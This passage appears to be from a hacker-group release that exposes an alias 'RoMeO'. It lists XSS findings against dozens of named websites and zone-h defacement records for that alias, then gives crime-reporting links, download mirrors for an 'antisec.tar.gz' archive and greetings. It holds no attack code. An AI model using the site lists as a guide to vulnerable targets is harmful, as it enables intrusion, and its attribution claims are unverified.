03/04/08 RoMeO www.name.com 13602 XSS mirror
|
||
03/04/08 RoMeO templates.entheosweb.com 13380 XSS mirror
|
||
31/03/08 RoMeO www.applyweb.com 50217 XSS mirror
|
||
31/03/08 RoMeO www.aast.edu 64423 XSS mirror
|
||
31/03/08 RoMeO www.cambridgescp.com 339535 XSS mirror
|
||
28/03/08 RoMeO www.freelotto.com R 306 XSS mirror
|
||
07/03/08 RoMeO www.sandboxie.com 70663 XSS mirror
|
||
06/03/08 RoMeO www.gulf-daily-news.com 14699 XSS mirror
|
||
06/03/08 RoMeO www.aucegypt.edu 38023 XSS mirror
|
||
06/03/08 RoMeO www.phpclanwebsite.com 986132 XSS mirror
|
||
05/03/08 RoMeO www.rapid-hook.com 95252 XSS mirror
|
||
05/03/08 RoMeO ipod.hopto.org 3648 XSS mirror
|
||
05/03/08 RoMeO www.darkshado.ca 6134372 XSS mirror
|
||
03/03/08 RoMeO www.macos.utah.edu 7333 XSS mirror
|
||
26/02/08 RoMeO www.rapidzearch.com 3797044 XSS mirror
|
||
11/02/08 RoMeO passport.51.com 184 XSS mirror
|
||
16/01/08 RoMeO www.memset.com 192269 XSS mirror
|
||
07/01/08 RoMeO search.mp3lyrics.org R 4309 XSS mirror
|
||
07/01/08 RoMeO qhost.eu 7969095 XSS mirror
|
||
05/01/08 RoMeO www.lpbs.org.uk 2776181 XSS mirror
|
||
04/01/08 RoMeO www.tdxp.net 0 XSS mirror
|
||
26/12/07 RoMeO aljaras.com 53022 XSS mirror
|
||
16/12/07 RoMeO www.sitemaps101.com 2163273 XSS mirror
|
||
15/12/07 RoMeO www.xml-sitemaps.com 8847 XSS mirror
|
||
10/12/07 RoMeO www.phpfaber.com 437969 XSS mirror
|
||
04/12/07 RoMeO www.tis-edu.com 0 XSS mirror
|
||
29/11/07 RoMeO pwnstarz.com 2025995 XSS mirror
|
||
23/11/07 RoMeO www.gamesurge.net 101368 XSS mirror
|
||
23/11/07 RoMeO cityguide.aol.com 54 XSS mirror
|
||
21/11/07 RoMeO my.notnet.co.uk 1419849 XSS mirror
|
||
06/11/07 RoMeO kwikhost.com 3593939 XSS mirror
|
||
06/11/07 RoMeO my.aol.com 54 XSS mirror
|
||
06/11/07 RoMeO www.searchtons.com 145218 XSS mirror
|
||
05/11/07 RoMeO www.seologs.com 18186 XSS mirror
|
||
05/11/07 RoMeO tools.elitehackers.info 151229 XSS mirror
|
||
05/11/07 RoMeO gallery.particlesoft.net 364744 XSS mirror
|
||
04/11/07 RoMeO www.filecart.com 27636 XSS mirror
|
||
04/11/07 RoMeO chollotenis.com 0 XSS mirror
|
||
02/11/07 RoMeO tsdepot.co.uk R 6739237 XSS mirror
|
||
02/11/07 RoMeO www.pesladder.com 1172005 XSS mirror
|
||
31/10/07 RoMeO www.omni-chat.com 1857220 XSS mirror
|
||
28/10/07 RoMeO www.anafit.com 2563280 XSS mirror
|
||
28/10/07 RoMeO www.hellboundhackers.org 213995 XSS mirror
|
||
28/10/07 RoMeO www.cyclelogic.co.uk 3361622 XSS mirror
|
||
16/10/07 RoMeO tsdepot.co.uk 6739237 XSS mirror
|
||
06/10/07 RoMeO www.terrytrophy.com 0 XSS mirror
|
||
03/10/07 RoMeO www13.cd-wow.com 28971 XSS mirror
|
||
03/10/07 RoMeO www.drbeat.li 8200365 XSS mirror
|
||
02/10/07 RoMeO services.embark.com 12027 XSS mirror
|
||
27/09/07 RoMeO ascii.techhappens.com 1215439 XSS mirror
|
||
20/09/07 RoMeO www.org-rc.fr 1884591 XSS mirror
|
||
26/06/07 RoMeO search.fbi.gov 11963 XSS mirror
|
||
|
||
|
||
2) http://www.zone-h.org/archive/defacer=romeo
|
||
|
||
Time Attacker H M R Domain OS View
|
||
2007/11/06 Romeo H trakyagirl.uni.cc Win 2003 mirror
|
||
2007/09/23 RomeO H R www.zexir.tk Linux mirror
|
||
2006/12/11 RoMeO www.koturkiye.com/hacked Linux mirror
|
||
2006/10/21 ROMEO H www.duyguajans.com FreeBSD mirror
|
||
2006/09/06 romeo M www.yeniliman.com/forum Linux mirror
|
||
2006/09/06 romeo M www.genc4um.com/forum Linux mirror
|
||
2006/09/06 ROMEO H www.forumhersey.com Linux mirror
|
||
2006/09/05 ROMEO M www.muzikogretmenleri.com/foru... Linux mirror
|
||
2006/09/05 ROMEO M www.sanalailem.com/forum Linux mirror
|
||
2006/09/05 ROMEO rocksitesi.net/forum/index.php Linux mirror
|
||
2006/09/05 ROMEO www.beyazrenkler.com/forum/ind... Linux mirror
|
||
2006/09/05 ROMEO www.yasakmp3.com/forum/index.php Win 2003 mirror
|
||
2006/09/05 ROMEO www.forumekani.com/index.php Linux mirror
|
||
2006/09/05 romeo www.turkfr.com/index.php Linux mirror
|
||
2006/09/05 romeo www.gizemliforum.org/index.php Linux mirror
|
||
2006/09/05 ROMEO www.arkadasbilisim.com/forum/i... Linux mirror
|
||
2006/09/05 ROMEO www.modifiyedunyasi.com/forum/... Linux mirror
|
||
2006/09/05 ROMEO www.forzatc.net/forum/index.php FreeBSD mirror
|
||
2006/09/05 ROMEO www.megaarsiv.net/index.php Linux mirror
|
||
2006/09/05 ROMEO egeizmir.com/forum/index.php Linux mirror
|
||
2006/09/05 ROMEO R www.nokiacep.com/forum/index.php Win 2003 mirror
|
||
2006/09/04 romeo H www.cyber-turka.org Win 2003 mirror
|
||
2006/07/12 romeo www.cehennem.net/den Linux mirror
|
||
2006/05/29 romeo H gorno-altaisk.ru Linux mirror
|
||
2006/05/29 ROMEO H M www.nobel.uz Win 2000 mirror
|
||
2006/05/29 ROMEO H R www.tdshi.uz Win 2000 mirror
|
||
2006/05/17 romeo H forumliontr.com Linux mirror
|
||
2006/05/02 romeo M www.pichiz.biz/forum Linux mirror
|
||
2006/05/02 ROMEO M www.trmizah.com/smf Linux mirror
|
||
2006/05/02 ROMEO H M www.rapsohbeti.com Linux mirror
|
||
2006/04/23 romeo www.gecelerinforumu.com/forum/... Linux mirror
|
||
2006/03/19 romeo www.esmer.org/index.php Linux mirror
|
||
2006/01/12 romeo M sitebirligi.com/~oyuncu/hacked... Linux mirror
|
||
2006/01/12 romeo M konya-kosk.bel.tr/~oyuncu/hack... Linux mirror
|
||
2006/01/12 romeo M aktueldershanesi.com/~oyuncu/h... Linux mirror
|
||
2006/01/12 romeo M www.hesapliweb.com/~oyuncu/hac... Linux mirror
|
||
2006/01/12 romeo M www.aheninsaat.com/~oyuncu/hac... Linux mirror
|
||
2006/01/12 romeo M www.mp3ilahi.com/~oyuncu/hacke... Linux mirror
|
||
2006/01/12 romeo M www.eurotipsters.com/~oyuncu/h... Linux mirror
|
||
2006/01/12 romeo M www.kardeslik.org/~oyuncu/hack... Linux mirror
|
||
2006/01/12 romeo M www.hiperx.net/~oyuncu/hacked/... Linux mirror
|
||
2006/01/12 romeo M www.najans.com/~oyuncu/hacked/... Linux mirror
|
||
2006/01/12 romeo M www.gulmece.net/~oyuncu/hacked... Linux mirror
|
||
2006/01/12 romeo M www.cigilfm.com/~oyuncu/hacked... Linux mirror
|
||
2006/01/12 romeo M www.gifturk.com/~oyuncu/hacked... Linux mirror
|
||
2006/01/12 romeo M www.why-islam.net/~oyuncu/hack... Linux mirror
|
||
2006/01/12 romeo M www.e-matrak.org/~oyuncu/hacke... Linux mirror
|
||
2006/01/12 romeo M www.kazancyolu.com/~oyuncu/hac... Linux mirror
|
||
2006/01/12 romeo M www.hiperstore.gen.tr/~oyuncu/... Linux mirror
|
||
2006/01/12 romeo M www.senarslan.com/~oyuncu/hack... Linux mirror
|
||
2006/01/12 romeo M www.aprohosting.net/~oyuncu//h... Linux mirror
|
||
2006/01/12 romeo M R www.gulum.net/~oyuncu//hacked/... Linux mirror
|
||
2006/01/12 romeo M R www.basinyayin.net/~oyuncu//ha... Linux mirror
|
||
2006/01/12 romeo M www.dinleradyo.com/~oyuncu//ha... Linux mirror
|
||
2006/01/12 romeo M www.sitetasarimi.com/~oyuncu//... Linux mirror
|
||
2005/04/08 romeo votedevoe.org/v-web/portal/cms... FreeBSD mirror
|
||
2005/03/23 romeo R www.willowsend.co.nz/index.php Linux mirror
|
||
2005/03/23 romeo H M moh.theclap.co.nz Linux mirror
|
||
|
||
|
||
_______ ___________
|
||
\ _ \ ___ __/_ \ _ \
|
||
/ /_\ \\ \/ /| / /_\ \
|
||
\ \_/ \> < | \ \_/ \
|
||
\_____ /__/\_ \|___|\_____ /
|
||
\/ \/ \/
|
||
__________ __ .__
|
||
\______ \ ____ ______ ____________/ |_|__| ____ ____
|
||
| _// __ \\____ \ / _ \_ __ \ __\ |/ \ / ___\
|
||
| | \ ___/| |_> > <_> ) | \/| | | | | \/ /_/ >
|
||
|____|_ /\___ > __/ \____/|__| |__| |__|___| /\___ /
|
||
\/ \/|__| \//_____/
|
||
|
||
|
||
1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
|
||
2) http://www.fbi.gov/contact/fo/fo.htm
|
||
3) http://www.treas.gov/usss/index.shtml
|
||
4) http://www.ic3.gov/default.aspx
|
||
5) http://www.tra.gov.ae/complaints.php
|
||
|
||
|
||
_______ ____ ____
|
||
\ _ \ ___ __/_ /_ |
|
||
/ /_\ \\ \/ /| || |
|
||
\ \_/ \> < | || |
|
||
\_____ /__/\_ \|___||___|
|
||
\/ \/
|
||
_____ __ __ .__ __
|
||
/ _ \_/ |__/ |______ ____ | |__ _____ ____ _____/ |_ ______
|
||
/ /_\ \ __\ __\__ \ _/ ___\| | \ / \_/ __ \ / \ __\/ ___/
|
||
/ | \ | | | / __ \\ \___| Y \ Y Y \ ___/| | \ | \___ \
|
||
\____|__ /__| |__| (____ /\___ >___| /__|_| /\___ >___| /__| /____ >
|
||
\/ \/ \/ \/ \/ \/ \/ \/
|
||
|
||
Mirrors
|
||
|
||
1. http://rapidshare.com/files/328431323/antisec.tar.gz
|
||
2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
|
||
3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
|
||
4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
|
||
5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
|
||
6. http://www.sendspace.com/file/07clr5
|
||
|
||
|
||
_______ ____________
|
||
\ _ \ ___ __/_ \_____ \
|
||
/ /_\ \\ \/ /| |/ ____/
|
||
\ \_/ \> < | / \
|
||
\_____ /__/\_ \|___\_______ \
|
||
\/ \/ \/
|
||
_________ .__ .__
|
||
\_ ___ \ ____ ____ ____ | | __ __ _____|__| ____ ____
|
||
/ \ \/ / _ \ / \_/ ___\| | | | \/ ___/ |/ _ \ / \
|
||
\ \___( <_> ) | \ \___| |_| | /\___ \| ( <_> ) | \
|
||
\______ /\____/|___| /\___ >____/____//____ >__|\____/|___| /
|
||
\/ \/ \/ \/ \/
|
||
|
||
What we tend to believe is that most of the so-called blackhats had lost or still strive towards the chance of
|
||
becoming an integral part of the information security industry and so they are blaming people who share old
|
||
and new information regarding the protection of corporate and personal information assets, including ICT systems
|
||
and social security.
|
||
|
||
_______ ____________
|
||
\ _ \ ___ __/_ \_____ \
|
||
/ /_\ \\ \/ /| | _(__ <
|
||
\ \_/ \> < | |/ \
|
||
\_____ /__/\_ \|___/______ /
|
||
\/ \/ \/
|
||
________ __
|
||
/ _____/______ ____ _____/ |_________
|
||
/ \ __\_ __ \_/ __ \_/ __ \ __\___ /
|
||
\ \_\ \ | \/\ ___/\ ___/| | / /
|
||
\______ /__| \___ >\___ >__| /_____ \
|
||
\/ \/ \/ \/
|
||
|
||
We want to thank the following people for their contribution. You know who you are!
|
||
Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors
|